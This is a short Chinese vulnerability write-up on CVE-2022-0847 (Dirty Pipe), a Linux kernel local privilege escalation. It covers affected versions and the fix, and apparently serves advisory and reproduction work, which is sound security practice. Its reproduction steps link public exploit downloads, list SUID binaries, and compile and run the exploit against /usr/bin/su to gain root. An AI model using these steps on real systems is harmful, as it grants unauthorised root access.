1.漏洞描述
CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地提权漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通权限的用户提升到特权 root。CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞(Dirty Cow),但它更容易被利用。
2.漏洞影响范围
linux内核5.8及之后的版本
PS:该漏洞已 在 Linux 5.16.11、5.15.25 和 5.10.102 中修复
3.漏洞环境
本地Linux内核版本5.14.16
4.漏洞复现
方法一:使用Dirty-Pipe.sh文件进行提权
EXP下载:https://github.com/imfiver/CVE-2022-0847
bash Dirty-Pipe.sh
方法二:使用dirtypipez.c文件进行提权
EXP下载:https://haxx.in/files/dirtypipez.c
在使用这个POC时,需要先找到一个具有 SUID 权限的可执行文件,然后利用这个文件进行提权,使用以下命令可以找到这类文件
find / -perm -u=s -type f 2>/dev/null
gcc dirtypipez.c -o dirtypipez #编译生成exp
./dirtypipez /usr/bin/su #执行exp,并指定具有suid权限的可执行文件
./dirtypipez /usr/sbin/pppd
5.修复建议
更新升级 Linux 内核到以下安全版本:
Linux 内核 >= 5.16.11
Linux 内核 >= 5.15.25
Linux 内核 >= 5.10.102